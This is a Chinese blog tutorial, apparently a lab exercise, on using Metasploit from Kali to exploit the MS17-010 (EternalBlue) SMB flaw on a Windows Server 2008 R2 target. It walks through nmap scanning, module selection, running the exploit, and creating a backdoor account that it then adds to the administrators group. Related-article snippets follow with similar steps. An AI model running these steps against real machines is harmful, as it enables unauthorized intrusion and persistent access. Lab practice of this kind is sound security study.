永恒之蓝漏洞发现与利用

于 2021-12-08 19:08:11 发布
阅读量3.7k 收藏 2
点赞数 6
文章标签: 安全 kali 永恒之蓝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaogaoxiaoyuan/article/details/121798453
版权

永恒之蓝恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

攻击机:kali linux
靶机:Windows sever2008 r2
kali和靶机要在同一个网段
我们打开kali

nmap -Pn(目标ip) 扫描目标端口开启情况,主要目标445
在这里插入图片描述
msfconsole 打开攻击软件
在这里插入图片描述
search ms17-010 查看漏洞利用模块
在这里插入图片描述
use 0(一共四个模块,第一个是扫描模块) 打开扫描模块

show options 打开目标设置界面,设置RHOSTS目标IP地址
在这里插入图片描述
set rhosts (目标ip) 设置目标IP地址 也是windows server2008 r2的ip
在这里插入图片描述
run 运行漏洞
在这里插入图片描述
net user king9 2000666zli. /add [在目标主机上创建一个名为king9的账户,密码 2000666zli.
在这里插入图片描述
目标主机被创建账户

因为是创建的用户 所有没有管理员权限,我们给他进行提权
kali下对win7提权

net localgroup administrators 账户名/add

然后我们登陆windows server2008r2
在这里插入图片描述

boboaiwanshua
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
学习笔记 vm虚拟机模拟实战打靶(永恒之)
qq_52360932的博客
12-17 4950
1、查看靶机的ip地址:(即信息收集获取靶机ip,这里我直接在靶机内查看了ip地址,实际上应该进行信息收集获取ip) 2、返回启动kali,进入root,输入netdiscover(这一步是为了查看是否可以搜索到靶机ip) 3、发现靶机后,nmap扫描靶机,发现存在445端口(本人刚学习,使用永恒之进行渗透) nmap -sV -O -A -T4 192.168.108.137 -sV版本识别 -O 是系统识别 -A 是进攻性扫描 -T4 是 以4级的速度扫描 4、启...
永恒之复现
weixin_45116657的博客
08-16 747
一、实验环境: kali攻击机—IP地址:192.168.85.156 Win 2008靶机—IP地址:192.168.85.152 二、实验过程: 1、扫描靶机,查看445端口是否开放; 2、复现 2.1> 在kali中打开METASPLOIT 打开控制平台:msfconsole平台 2.2> 在msfconsole平台上搜索ms17-010相关模块; search ms17-...
MSF渗透测试
weixin_51646864的博客
08-12 1082
MSF入门实验
Metasploit framework
qq_49091880的博客
01-27 580
工具:the Metasploit framework 1.启动命令:msfconsole 一些参数解释: (1)exploit:是代表利用漏洞进行攻击动作的模块 (2)auciliary:负责执行信息收集、扫描、嗅探 (3)post:后渗透模块 2.搜索命令 (1)例如:search ms17-010(搜索ms17-010漏洞模块) 查看是否存在这个漏洞 命令:set rhosts 目标主机IP地址 3.以ms17-010的第三个模块为例(永恒之) 命令:use 3(利用永恒之模块) 命令:info(
msf rhosts设置文件_msf之CVE20190708Bluekeep漏洞利用模块
weixin_39625864的博客
11-28 456
msf之CVE-2019-0708-Bluekeep漏洞利用模块漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用利用漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年Wan...
永恒之漏洞扫描工具官方版
08-06
"永恒之漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
MS1710永恒之漏洞利用
最新发布
07-07
MS1710永恒之漏洞利用
永恒之漏洞演示
12-22
利用kali linux在windows7上演示永恒之漏洞,有kali实战经验的可以看懂
win2012R2永恒之安全补丁.zip
05-12
永恒之漏洞源自微软的SMB(Server Message Block)服务,这是一个允许网络上的计算机共享文件、打印机和网络资源的协议。该漏洞(CVE-2017-0144和CVE-2017-0145)允许远程代码执行,使得攻击者无需用户交互即可...
永恒之检测.zip
10-20
2. **WannaCry勒索软件**:利用永恒之漏洞,WannaCry在全球范围内快速扩散,通过自我复制的方式感染计算机,并对用户数据进行加密,然后要求支付赎金以解锁。 3. **预防措施**:为了防止永恒之攻击,首先需要...
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
msf rhosts设置文件_利用MSF检测CVE20190708漏洞
weixin_39737224的博客
11-28 547
CVE-2019-0708漏洞被称为“永恒之”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。GitHub项目:https://github.com/zerosum0x0/CVE-2019-0708MSF模块:ht...
Kali Linux渗透测试 143 Mestasploit 信息收集
kevinhanser
04-19 1592
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 模块位置: 信息收集的模块都在 auxiliary/scanner/ 之下msf > use auxiliary/scanner/ [TAB] Display all 531 possibilities? (
【Metasploit总结】之【MSF常用命令及信息收集】
AA8j的博客
12-10 3770
初识MSF smfconsole常用命令 msfconsole下可以直接使用终端命令,如ping等 msfdb start # 启动msf数据库,msf数据库是使用的postgresql的5432端口,新版本的postgresql是5433无法使用,需要到/etc/postgresql/13/main/postgresql.conf下修改为5432端口 msfconsole -q # 启动msfconsole(-q为安静启动) db_status # 查看数据库状态,若显示no connect,先exit
MSF之ms17-010永恒之漏洞利用
热门推荐
极光时流
11-26 1万+
MSF之ms17-010永恒之漏洞利用准备扫描漏洞漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali系统,其IP为:192.168.207.130 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole use auxiliary/scanner/smb/s...
msf rhosts设置文件_msf系列之大牛黑客必须学的控制台命令
weixin_39825322的博客
11-06 989
1、 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集...
渗透测试之踩点篇
自学编程_youkewang.top
02-15 4490
网络踩点犹如躲在暗处的狙击手,只观察情况而不进行射击,有 踩点的以下途径: 1:通过搜索引擎进行信息收集 1.1:google Hacking技术 搜索工具. 1:SiteDigger 2:Search Diggity (此款软件还支持对源代码、恶意软件等进行分析)   1.2:探索网站的目录结构 1:常见的后台管理目录:admin、login、cms 通过google来
羽翼metasploit第一,二季学习笔记
weixin_30379911的博客
03-07 364
-----------------第一季-------------------- 启动Metasploit:msfconsole 升级和更新:./msfupdate 直接退出:exit 退回上一级:quit1.端口扫描: a.调用Nmap扫描 nmap -v -sV ip b.调用msf模块扫描(1) use auxiliary/scanner/portsca...
搞死虚拟机-永恒之和shift后门
shy的博客
07-30 925
扫描端口:发现开启了445端口可能存在永恒之(ms17_010)漏洞 nmap -sV -p- -A -v 192.168.206.129 开启msf msfconsole 搜素 search ms17_010 使用msf验证脚本,验证是否存在ms17_010 use auxiliary/scanner/smb/smb_ms17_010 show options 配置验证脚本 set RHOSTS 192.168.206.129 运行 run 显示存在ms17_010漏洞 .
利用Metasploit的永恒之漏洞渗透win10
05-02
在使用Metasploit渗透测试工具之前,需要先了解一些基础知识。永恒之漏洞是一个远程代码执行漏洞,它利用了Windows SMB v1协议中的一个缓冲区溢出漏洞。该漏洞可以使攻击者通过网络获取Windows系统的控制权,而无需进行身份验证。 以下是使用Metasploit进行永恒之漏洞渗透win10的步骤: 1. 首先,需要确定目标机器的IP地址和操作系统版本。可以使用nmap或其他扫描工具进行扫描。 2. 打开Kali Linux终端,输入msfconsole命令打开Metasploit控制台。 3. 在Metasploit控制台中输入search eternalblue,选择对应的exploit模块进行利用。 4. 设置目标机器的IP地址,以及目标机器的操作系统版本。 5. 输入run命令开始攻击,Metasploit会自动进行漏洞利用尝试。 6. 如果攻击成功,将会得到一个反向Shell,可以使用该Shell进行后续操作。 需要注意的是,永恒之漏洞是一个非常危险的漏洞,使用Metasploit进行渗透测试时需要遵守相关法律法规,以及遵守渗透测试的道德规范。建议只在合法授权的情况下使用Metasploit进行渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值